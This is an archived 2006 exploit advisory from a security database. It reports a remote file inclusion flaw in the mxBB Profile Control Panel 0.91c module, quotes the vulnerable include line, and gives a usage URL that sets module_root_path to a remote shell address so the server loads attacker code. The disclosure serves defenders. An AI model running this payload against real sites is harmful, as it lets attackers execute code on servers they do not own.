Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15361
HistoryDec 10, 2006 - 12:00 a.m.

mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability

2006-12-1000:00:00
vulners.com
13

###############################################################################

mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability

Bugfound3R: bd0rk || SOH-Crew

Website: www.soh-crew.it.tt

Greetz: str0ke, Lu7k, TheJT, Natok

###############################################################################

Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=70

==> Vulnerable Code in profilcp_constants.php <==

Code: include_once($module_root_path . 'includes/lang_extend_mac.'.$phpEx);

Usage: http://[y0uRSiTe]/[direct0ry]/includes/profilcp_constants.php?module_root_path=http://Sh3LL?